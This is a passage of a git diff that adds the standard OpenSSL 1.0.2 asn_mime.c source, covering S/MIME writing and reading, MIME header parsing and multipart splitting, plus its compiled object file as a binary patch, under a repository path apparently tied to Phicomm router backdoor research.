+            ASN1err(ASN1_F_I2D_ASN1_BIO_STREAM, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        SMIME_crlf_copy(in, bio, flags);
+        (void)BIO_flush(bio);
+        /* Free up successive BIOs until we hit the old output BIO */
+        do {
+            tbio = BIO_pop(bio);
+            BIO_free(bio);
+            bio = tbio;
+        } while (bio != out);
+    }
+    /*
+     * else just write out ASN1 structure which will have all content stored
+     * internally
+     */
+    else
+        ASN1_item_i2d_bio(it, out, val);
+    return 1;
+}
+
+/* Base 64 read and write of ASN1 structure */
+
+static int B64_write_ASN1(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
+                          const ASN1_ITEM *it)
+{
+    BIO *b64;
+    int r;
+    b64 = BIO_new(BIO_f_base64());
+    if (!b64) {
+        ASN1err(ASN1_F_B64_WRITE_ASN1, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    /*
+     * prepend the b64 BIO so all data is base64 encoded.
+     */
+    out = BIO_push(b64, out);
+    r = i2d_ASN1_bio_stream(out, val, in, flags, it);
+    (void)BIO_flush(out);
+    BIO_pop(out);
+    BIO_free(b64);
+    return r;
+}
+
+/* Streaming ASN1 PEM write */
+
+int PEM_write_bio_ASN1_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
+                              const char *hdr, const ASN1_ITEM *it)
+{
+    int r;
+    BIO_printf(out, "-----BEGIN %s-----\n", hdr);
+    r = B64_write_ASN1(out, val, in, flags, it);
+    BIO_printf(out, "-----END %s-----\n", hdr);
+    return r;
+}
+
+static ASN1_VALUE *b64_read_asn1(BIO *bio, const ASN1_ITEM *it)
+{
+    BIO *b64;
+    ASN1_VALUE *val;
+    if (!(b64 = BIO_new(BIO_f_base64()))) {
+        ASN1err(ASN1_F_B64_READ_ASN1, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    bio = BIO_push(b64, bio);
+    val = ASN1_item_d2i_bio(it, bio, NULL);
+    if (!val)
+        ASN1err(ASN1_F_B64_READ_ASN1, ASN1_R_DECODE_ERROR);
+    (void)BIO_flush(bio);
+    bio = BIO_pop(bio);
+    BIO_free(b64);
+    return val;
+}
+
+/* Generate the MIME "micalg" parameter from RFC3851, RFC4490 */
+
+static int asn1_write_micalg(BIO *out, STACK_OF(X509_ALGOR) *mdalgs)
+{
+    const EVP_MD *md;
+    int i, have_unknown = 0, write_comma, ret = 0, md_nid;
+    have_unknown = 0;
+    write_comma = 0;
+    for (i = 0; i < sk_X509_ALGOR_num(mdalgs); i++) {
+        if (write_comma)
+            BIO_write(out, ",", 1);
+        write_comma = 1;
+        md_nid = OBJ_obj2nid(sk_X509_ALGOR_value(mdalgs, i)->algorithm);
+        md = EVP_get_digestbynid(md_nid);
+        if (md && md->md_ctrl) {
+            int rv;
+            char *micstr;
+            rv = md->md_ctrl(NULL, EVP_MD_CTRL_MICALG, 0, &micstr);
+            if (rv > 0) {
+                BIO_puts(out, micstr);
+                OPENSSL_free(micstr);
+                continue;
+            }
+            if (rv != -2)
+                goto err;
+        }
+        switch (md_nid) {
+        case NID_sha1:
+            BIO_puts(out, "sha1");
+            break;
+
+        case NID_md5:
+            BIO_puts(out, "md5");
+            break;
+
+        case NID_sha256:
+            BIO_puts(out, "sha-256");
+            break;
+
+        case NID_sha384:
+            BIO_puts(out, "sha-384");
+            break;
+
+        case NID_sha512:
+            BIO_puts(out, "sha-512");
+            break;
+
+        case NID_id_GostR3411_94:
+            BIO_puts(out, "gostr3411-94");
+            goto err;
+            break;
+
+        default:
+            if (have_unknown)
+                write_comma = 0;
+            else {
+                BIO_puts(out, "unknown");
+                have_unknown = 1;
+            }
+            break;
+
+        }
+    }
+
+    ret = 1;
+ err:
+
+    return ret;
+
+}
+
+/* SMIME sender */
+
+int SMIME_write_ASN1(BIO *bio, ASN1_VALUE *val, BIO *data, int flags,
+                     int ctype_nid, int econt_nid,
+                     STACK_OF(X509_ALGOR) *mdalgs, const ASN1_ITEM *it)
+{
+    char bound[33], c;
+    int i;
+    const char *mime_prefix, *mime_eol, *cname = "smime.p7m";
+    const char *msg_type = NULL;
+    if (flags & SMIME_OLDMIME)
+        mime_prefix = "application/x-pkcs7-";
+    else
+        mime_prefix = "application/pkcs7-";
+
+    if (flags & SMIME_CRLFEOL)
+        mime_eol = "\r\n";
+    else
+        mime_eol = "\n";
+    if ((flags & SMIME_DETACHED) && data) {
+        /* We want multipart/signed */
+        /* Generate a random boundary */
+        RAND_pseudo_bytes((unsigned char *)bound, 32);
+        for (i = 0; i < 32; i++) {
+            c = bound[i] & 0xf;
+            if (c < 10)
+                c += '0';
+            else
+                c += 'A' - 10;
+            bound[i] = c;
+        }
+        bound[32] = 0;
+        BIO_printf(bio, "MIME-Version: 1.0%s", mime_eol);
+        BIO_printf(bio, "Content-Type: multipart/signed;");
+        BIO_printf(bio, " protocol=\"%ssignature\";", mime_prefix);
+        BIO_puts(bio, " micalg=\"");
+        asn1_write_micalg(bio, mdalgs);
+        BIO_printf(bio, "\"; boundary=\"----%s\"%s%s",
+                   bound, mime_eol, mime_eol);
+        BIO_printf(bio, "This is an S/MIME signed message%s%s",
+                   mime_eol, mime_eol);
+        /* Now write out the first part */
+        BIO_printf(bio, "------%s%s", bound, mime_eol);
+        if (!asn1_output_data(bio, data, val, flags, it))
+            return 0;
+        BIO_printf(bio, "%s------%s%s", mime_eol, bound, mime_eol);
+
+        /* Headers for signature */
+
+        BIO_printf(bio, "Content-Type: %ssignature;", mime_prefix);
+        BIO_printf(bio, " name=\"smime.p7s\"%s", mime_eol);
+        BIO_printf(bio, "Content-Transfer-Encoding: base64%s", mime_eol);
+        BIO_printf(bio, "Content-Disposition: attachment;");
+        BIO_printf(bio, " filename=\"smime.p7s\"%s%s", mime_eol, mime_eol);
+        B64_write_ASN1(bio, val, NULL, 0, it);
+        BIO_printf(bio, "%s------%s--%s%s", mime_eol, bound,
+                   mime_eol, mime_eol);
+        return 1;
+    }
+
+    /* Determine smime-type header */
+
+    if (ctype_nid == NID_pkcs7_enveloped)
+        msg_type = "enveloped-data";
+    else if (ctype_nid == NID_pkcs7_signed) {
+        if (econt_nid == NID_id_smime_ct_receipt)
+            msg_type = "signed-receipt";
+        else if (sk_X509_ALGOR_num(mdalgs) >= 0)
+            msg_type = "signed-data";
+        else
+            msg_type = "certs-only";
+    } else if (ctype_nid == NID_id_smime_ct_compressedData) {
+        msg_type = "compressed-data";
+        cname = "smime.p7z";
+    }
+    /* MIME headers */
+    BIO_printf(bio, "MIME-Version: 1.0%s", mime_eol);
+    BIO_printf(bio, "Content-Disposition: attachment;");
+    BIO_printf(bio, " filename=\"%s\"%s", cname, mime_eol);
+    BIO_printf(bio, "Content-Type: %smime;", mime_prefix);
+    if (msg_type)
+        BIO_printf(bio, " smime-type=%s;", msg_type);
+    BIO_printf(bio, " name=\"%s\"%s", cname, mime_eol);
+    BIO_printf(bio, "Content-Transfer-Encoding: base64%s%s",
+               mime_eol, mime_eol);
+    if (!B64_write_ASN1(bio, val, data, flags, it))
+        return 0;
+    BIO_printf(bio, "%s", mime_eol);
+    return 1;
+}
+
+/* Handle output of ASN1 data */
+
+static int asn1_output_data(BIO *out, BIO *data, ASN1_VALUE *val, int flags,
+                            const ASN1_ITEM *it)
+{
+    BIO *tmpbio;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_STREAM_ARG sarg;
+    int rv = 1;
+
+    /*
+     * If data is not deteched or resigning then the output BIO is already
+     * set up to finalise when it is written through.
+     */
+    if (!(flags & SMIME_DETACHED) || (flags & PKCS7_REUSE_DIGEST)) {
+        SMIME_crlf_copy(data, out, flags);
+        return 1;
+    }
+
+    if (!aux || !aux->asn1_cb) {
+        ASN1err(ASN1_F_ASN1_OUTPUT_DATA, ASN1_R_STREAMING_NOT_SUPPORTED);
+        return 0;
+    }
+
+    sarg.out = out;
+    sarg.ndef_bio = NULL;
+    sarg.boundary = NULL;
+
+    /* Let ASN1 code prepend any needed BIOs */
+
+    if (aux->asn1_cb(ASN1_OP_DETACHED_PRE, &val, it, &sarg) <= 0)
+        return 0;
+
+    /* Copy data across, passing through filter BIOs for processing */
+    SMIME_crlf_copy(data, sarg.ndef_bio, flags);
+
+    /* Finalize structure */
+    if (aux->asn1_cb(ASN1_OP_DETACHED_POST, &val, it, &sarg) <= 0)
+        rv = 0;
+
+    /* Now remove any digests prepended to the BIO */
+
+    while (sarg.ndef_bio != out) {
+        tmpbio = BIO_pop(sarg.ndef_bio);
+        BIO_free(sarg.ndef_bio);
+        sarg.ndef_bio = tmpbio;
+    }
+
+    return rv;
+
+}
+
+/*
+ * SMIME reader: handle multipart/signed and opaque signing. in multipart
+ * case the content is placed in a memory BIO pointed to by "bcont". In
+ * opaque this is set to NULL
+ */
+
+ASN1_VALUE *SMIME_read_ASN1(BIO *bio, BIO **bcont, const ASN1_ITEM *it)
+{
+    BIO *asnin;
+    STACK_OF(MIME_HEADER) *headers = NULL;
+    STACK_OF(BIO) *parts = NULL;
+    MIME_HEADER *hdr;
+    MIME_PARAM *prm;
+    ASN1_VALUE *val;
+    int ret;
+
+    if (bcont)
+        *bcont = NULL;
+
+    if (!(headers = mime_parse_hdr(bio))) {
+        ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_MIME_PARSE_ERROR);
+        return NULL;
+    }
+
+    if (!(hdr = mime_hdr_find(headers, "content-type")) || !hdr->value) {
+        sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+        ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_NO_CONTENT_TYPE);
+        return NULL;
+    }
+
+    /* Handle multipart/signed */
+
+    if (!strcmp(hdr->value, "multipart/signed")) {
+        /* Split into two parts */
+        prm = mime_param_find(hdr, "boundary");
+        if (!prm || !prm->param_value) {
+            sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+            ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_NO_MULTIPART_BOUNDARY);
+            return NULL;
+        }
+        ret = multi_split(bio, prm->param_value, &parts);
+        sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+        if (!ret || (sk_BIO_num(parts) != 2)) {
+            ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_NO_MULTIPART_BODY_FAILURE);
+            sk_BIO_pop_free(parts, BIO_vfree);
+            return NULL;
+        }
+
+        /* Parse the signature piece */
+        asnin = sk_BIO_value(parts, 1);
+
+        if (!(headers = mime_parse_hdr(asnin))) {
+            ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_MIME_SIG_PARSE_ERROR);
+            sk_BIO_pop_free(parts, BIO_vfree);
+            return NULL;
+        }
+
+        /* Get content type */
+
+        if (!(hdr = mime_hdr_find(headers, "content-type")) || !hdr->value) {
+            sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+            ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_NO_SIG_CONTENT_TYPE);
+            return NULL;
+        }
+
+        if (strcmp(hdr->value, "application/x-pkcs7-signature") &&
+            strcmp(hdr->value, "application/pkcs7-signature")) {
+            ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_SIG_INVALID_MIME_TYPE);
+            ERR_add_error_data(2, "type: ", hdr->value);
+            sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+            sk_BIO_pop_free(parts, BIO_vfree);
+            return NULL;
+        }
+        sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+        /* Read in ASN1 */
+        if (!(val = b64_read_asn1(asnin, it))) {
+            ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_ASN1_SIG_PARSE_ERROR);
+            sk_BIO_pop_free(parts, BIO_vfree);
+            return NULL;
+        }
+
+        if (bcont) {
+            *bcont = sk_BIO_value(parts, 0);
+            BIO_free(asnin);
+            sk_BIO_free(parts);
+        } else
+            sk_BIO_pop_free(parts, BIO_vfree);
+        return val;
+    }
+
+    /* OK, if not multipart/signed try opaque signature */
+
+    if (strcmp(hdr->value, "application/x-pkcs7-mime") &&
+        strcmp(hdr->value, "application/pkcs7-mime")) {
+        ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_INVALID_MIME_TYPE);
+        ERR_add_error_data(2, "type: ", hdr->value);
+        sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+        return NULL;
+    }
+
+    sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+
+    if (!(val = b64_read_asn1(bio, it))) {
+        ASN1err(ASN1_F_SMIME_READ_ASN1, ASN1_R_ASN1_PARSE_ERROR);
+        return NULL;
+    }
+    return val;
+
+}
+
+/* Copy text from one BIO to another making the output CRLF at EOL */
+int SMIME_crlf_copy(BIO *in, BIO *out, int flags)
+{
+    BIO *bf;
+    char eol;
+    int len;
+    char linebuf[MAX_SMLEN];
+    /*
+     * Buffer output so we don't write one line at a time. This is useful
+     * when streaming as we don't end up with one OCTET STRING per line.
+     */
+    bf = BIO_new(BIO_f_buffer());
+    if (!bf)
+        return 0;
+    out = BIO_push(bf, out);
+    if (flags & SMIME_BINARY) {
+        while ((len = BIO_read(in, linebuf, MAX_SMLEN)) > 0)
+            BIO_write(out, linebuf, len);
+    } else {
+        if (flags & SMIME_TEXT)
+            BIO_printf(out, "Content-Type: text/plain\r\n\r\n");
+        while ((len = BIO_gets(in, linebuf, MAX_SMLEN)) > 0) {
+            eol = strip_eol(linebuf, &len);
+            if (len)
+                BIO_write(out, linebuf, len);
+            if (eol)
+                BIO_write(out, "\r\n", 2);
+        }
+    }
+    (void)BIO_flush(out);
+    BIO_pop(out);
+    BIO_free(bf);
+    return 1;
+}
+
+/* Strip off headers if they are text/plain */
+int SMIME_text(BIO *in, BIO *out)
+{
+    char iobuf[4096];
+    int len;
+    STACK_OF(MIME_HEADER) *headers;
+    MIME_HEADER *hdr;
+
+    if (!(headers = mime_parse_hdr(in))) {
+        ASN1err(ASN1_F_SMIME_TEXT, ASN1_R_MIME_PARSE_ERROR);
+        return 0;
+    }
+    if (!(hdr = mime_hdr_find(headers, "content-type")) || !hdr->value) {
+        ASN1err(ASN1_F_SMIME_TEXT, ASN1_R_MIME_NO_CONTENT_TYPE);
+        sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+        return 0;
+    }
+    if (strcmp(hdr->value, "text/plain")) {
+        ASN1err(ASN1_F_SMIME_TEXT, ASN1_R_INVALID_MIME_TYPE);
+        ERR_add_error_data(2, "type: ", hdr->value);
+        sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+        return 0;
+    }
+    sk_MIME_HEADER_pop_free(headers, mime_hdr_free);
+    while ((len = BIO_read(in, iobuf, sizeof(iobuf))) > 0)
+        BIO_write(out, iobuf, len);
+    if (len < 0)
+        return 0;
+    return 1;
+}
+
+/*
+ * Split a multipart/XXX message body into component parts: result is
+ * canonical parts in a STACK of bios
+ */
+
+static int multi_split(BIO *bio, char *bound, STACK_OF(BIO) **ret)
+{
+    char linebuf[MAX_SMLEN];
+    int len, blen;
+    int eol = 0, next_eol = 0;
+    BIO *bpart = NULL;
+    STACK_OF(BIO) *parts;
+    char state, part, first;
+
+    blen = strlen(bound);
+    part = 0;
+    state = 0;
+    first = 1;
+    parts = sk_BIO_new_null();
+    *ret = parts;
+    while ((len = BIO_gets(bio, linebuf, MAX_SMLEN)) > 0) {
+        state = mime_bound_check(linebuf, len, bound, blen);
+        if (state == 1) {
+            first = 1;
+            part++;
+        } else if (state == 2) {
+            sk_BIO_push(parts, bpart);
+            return 1;
+        } else if (part) {
+            /* Strip CR+LF from linebuf */
+            next_eol = strip_eol(linebuf, &len);
+            if (first) {
+                first = 0;
+                if (bpart)
+                    sk_BIO_push(parts, bpart);
+                bpart = BIO_new(BIO_s_mem());
+                BIO_set_mem_eof_return(bpart, 0);
+            } else if (eol)
+                BIO_write(bpart, "\r\n", 2);
+            eol = next_eol;
+            if (len)
+                BIO_write(bpart, linebuf, len);
+        }
+    }
+    return 0;
+}
+
+/* This is the big one: parse MIME header lines up to message body */
+
+#define MIME_INVALID    0
+#define MIME_START      1
+#define MIME_TYPE       2
+#define MIME_NAME       3
+#define MIME_VALUE      4
+#define MIME_QUOTE      5
+#define MIME_COMMENT    6
+
+static STACK_OF(MIME_HEADER) *mime_parse_hdr(BIO *bio)
+{
+    char *p, *q, c;
+    char *ntmp;
+    char linebuf[MAX_SMLEN];
+    MIME_HEADER *mhdr = NULL;
+    STACK_OF(MIME_HEADER) *headers;
+    int len, state, save_state = 0;
+
+    headers = sk_MIME_HEADER_new(mime_hdr_cmp);
+    if (!headers)
+        return NULL;
+    while ((len = BIO_gets(bio, linebuf, MAX_SMLEN)) > 0) {
+        /* If whitespace at line start then continuation line */
+        if (mhdr && isspace((unsigned char)linebuf[0]))
+            state = MIME_NAME;
+        else
+            state = MIME_START;
+        ntmp = NULL;
+        /* Go through all characters */
+        for (p = linebuf, q = linebuf; (c = *p) && (c != '\r') && (c != '\n');
+             p++) {
+
+            /*
+             * State machine to handle MIME headers if this looks horrible
+             * that's because it *is*
+             */
+
+            switch (state) {
+            case MIME_START:
+                if (c == ':') {
+                    state = MIME_TYPE;
+                    *p = 0;
+                    ntmp = strip_ends(q);
+                    q = p + 1;
+                }
+                break;
+
+            case MIME_TYPE:
+                if (c == ';') {
+                    mime_debug("Found End Value\n");
+                    *p = 0;
+                    mhdr = mime_hdr_new(ntmp, strip_ends(q));
+                    sk_MIME_HEADER_push(headers, mhdr);
+                    ntmp = NULL;
+                    q = p + 1;
+                    state = MIME_NAME;
+                } else if (c == '(') {
+                    save_state = state;
+                    state = MIME_COMMENT;
+                }
+                break;
+
+            case MIME_COMMENT:
+                if (c == ')') {
+                    state = save_state;
+                }
+                break;
+
+            case MIME_NAME:
+                if (c == '=') {
+                    state = MIME_VALUE;
+                    *p = 0;
+                    ntmp = strip_ends(q);
+                    q = p + 1;
+                }
+                break;
+
+            case MIME_VALUE:
+                if (c == ';') {
+                    state = MIME_NAME;
+                    *p = 0;
+                    mime_hdr_addparam(mhdr, ntmp, strip_ends(q));
+                    ntmp = NULL;
+                    q = p + 1;
+                } else if (c == '"') {
+                    mime_debug("Found Quote\n");
+                    state = MIME_QUOTE;
+                } else if (c == '(') {
+                    save_state = state;
+                    state = MIME_COMMENT;
+                }
+                break;
+
+            case MIME_QUOTE:
+                if (c == '"') {
+                    mime_debug("Found Match Quote\n");
+                    state = MIME_VALUE;
+                }
+                break;
+            }
+        }
+
+        if (state == MIME_TYPE) {
+            mhdr = mime_hdr_new(ntmp, strip_ends(q));
+            sk_MIME_HEADER_push(headers, mhdr);
+        } else if (state == MIME_VALUE)
+            mime_hdr_addparam(mhdr, ntmp, strip_ends(q));
+        if (p == linebuf)
+            break;              /* Blank line means end of headers */
+    }
+
+    return headers;
+
+}
+
+static char *strip_ends(char *name)
+{
+    return strip_end(strip_start(name));
+}
+
+/* Strip a parameter of whitespace from start of param */
+static char *strip_start(char *name)
+{
+    char *p, c;
+    /* Look for first non white space or quote */
+    for (p = name; (c = *p); p++) {
+        if (c == '"') {
+            /* Next char is start of string if non null */
+            if (p[1])
+                return p + 1;
+            /* Else null string */
+            return NULL;
+        }
+        if (!isspace((unsigned char)c))
+            return p;
+    }
+    return NULL;
+}
+
+/* As above but strip from end of string : maybe should handle brackets? */
+static char *strip_end(char *name)
+{
+    char *p, c;
+    if (!name)
+        return NULL;
+    /* Look for first non white space or quote */
+    for (p = name + strlen(name) - 1; p >= name; p--) {
+        c = *p;
+        if (c == '"') {
+            if (p - 1 == name)
+                return NULL;
+            *p = 0;
+            return name;
+        }
+        if (isspace((unsigned char)c))
+            *p = 0;
+        else
+            return name;
+    }
+    return NULL;
+}
+
+static MIME_HEADER *mime_hdr_new(char *name, char *value)
+{
+    MIME_HEADER *mhdr;
+    char *tmpname, *tmpval, *p;
+    int c;
+    if (name) {
+        if (!(tmpname = BUF_strdup(name)))
+            return NULL;
+        for (p = tmpname; *p; p++) {
+            c = (unsigned char)*p;
+            if (isupper(c)) {
+                c = tolower(c);
+                *p = c;
+            }
+        }
+    } else
+        tmpname = NULL;
+    if (value) {
+        if (!(tmpval = BUF_strdup(value)))
+            return NULL;
+        for (p = tmpval; *p; p++) {
+            c = (unsigned char)*p;
+            if (isupper(c)) {
+                c = tolower(c);
+                *p = c;
+            }
+        }
+    } else
+        tmpval = NULL;
+    mhdr = (MIME_HEADER *)OPENSSL_malloc(sizeof(MIME_HEADER));
+    if (!mhdr)
+        return NULL;
+    mhdr->name = tmpname;
+    mhdr->value = tmpval;
+    if (!(mhdr->params = sk_MIME_PARAM_new(mime_param_cmp)))
+        return NULL;
+    return mhdr;
+}
+
+static int mime_hdr_addparam(MIME_HEADER *mhdr, char *name, char *value)
+{
+    char *tmpname, *tmpval, *p;
+    int c;
+    MIME_PARAM *mparam;
+    if (name) {
+        tmpname = BUF_strdup(name);
+        if (!tmpname)
+            return 0;
+        for (p = tmpname; *p; p++) {
+            c = (unsigned char)*p;
+            if (isupper(c)) {
+                c = tolower(c);
+                *p = c;
+            }
+        }
+    } else
+        tmpname = NULL;
+    if (value) {
+        tmpval = BUF_strdup(value);
+        if (!tmpval)
+            return 0;
+    } else
+        tmpval = NULL;
+    /* Parameter values are case sensitive so leave as is */
+    mparam = (MIME_PARAM *)OPENSSL_malloc(sizeof(MIME_PARAM));
+    if (!mparam)
+        return 0;
+    mparam->param_name = tmpname;
+    mparam->param_value = tmpval;
+    sk_MIME_PARAM_push(mhdr->params, mparam);
+    return 1;
+}
+
+static int mime_hdr_cmp(const MIME_HEADER *const *a,
+                        const MIME_HEADER *const *b)
+{
+    if (!(*a)->name || !(*b)->name)
+        return ! !(*a)->name - ! !(*b)->name;
+
+    return (strcmp((*a)->name, (*b)->name));
+}
+
+static int mime_param_cmp(const MIME_PARAM *const *a,
+                          const MIME_PARAM *const *b)
+{
+    if (!(*a)->param_name || !(*b)->param_name)
+        return ! !(*a)->param_name - ! !(*b)->param_name;
+    return (strcmp((*a)->param_name, (*b)->param_name));
+}
+
+/* Find a header with a given name (if possible) */
+
+static MIME_HEADER *mime_hdr_find(STACK_OF(MIME_HEADER) *hdrs, char *name)
+{
+    MIME_HEADER htmp;
+    int idx;
+    htmp.name = name;
+    idx = sk_MIME_HEADER_find(hdrs, &htmp);
+    if (idx < 0)
+        return NULL;
+    return sk_MIME_HEADER_value(hdrs, idx);
+}
+
+static MIME_PARAM *mime_param_find(MIME_HEADER *hdr, char *name)
+{
+    MIME_PARAM param;
+    int idx;
+    param.param_name = name;
+    idx = sk_MIME_PARAM_find(hdr->params, &param);
+    if (idx < 0)
+        return NULL;
+    return sk_MIME_PARAM_value(hdr->params, idx);
+}
+
+static void mime_hdr_free(MIME_HEADER *hdr)
+{
+    if (hdr->name)
+        OPENSSL_free(hdr->name);
+    if (hdr->value)
+        OPENSSL_free(hdr->value);
+    if (hdr->params)
+        sk_MIME_PARAM_pop_free(hdr->params, mime_param_free);
+    OPENSSL_free(hdr);
+}
+
+static void mime_param_free(MIME_PARAM *param)
+{
+    if (param->param_name)
+        OPENSSL_free(param->param_name);
+    if (param->param_value)
+        OPENSSL_free(param->param_value);
+    OPENSSL_free(param);
+}
+
+/*-
+ * Check for a multipart boundary. Returns:
+ * 0 : no boundary
+ * 1 : part boundary
+ * 2 : final boundary
+ */
+static int mime_bound_check(char *line, int linelen, char *bound, int blen)
+{
+    if (linelen == -1)
+        linelen = strlen(line);
+    if (blen == -1)
+        blen = strlen(bound);
+    /* Quickly eliminate if line length too short */
+    if (blen + 2 > linelen)
+        return 0;
+    /* Check for part boundary */
+    if (!strncmp(line, "--", 2) && !strncmp(line + 2, bound, blen)) {
+        if (!strncmp(line + blen + 2, "--", 2))
+            return 2;
+        else
+            return 1;
+    }
+    return 0;
+}
+
+static int strip_eol(char *linebuf, int *plen)
+{
+    int len = *plen;
+    char *p, c;
+    int is_eol = 0;
+    p = linebuf + len - 1;
+    for (p = linebuf + len - 1; len > 0; len--, p--) {
+        c = *p;
+        if (c == '\n')
+            is_eol = 1;
+        else if (c != '\r')
+            break;
+    }
+    *plen = len;
+    return is_eol;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.o
new file mode 100644
index 0000000000000000000000000000000000000000..1724ddba809e6dd441108717891482c32078f701
GIT binary patch
literal 18568
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
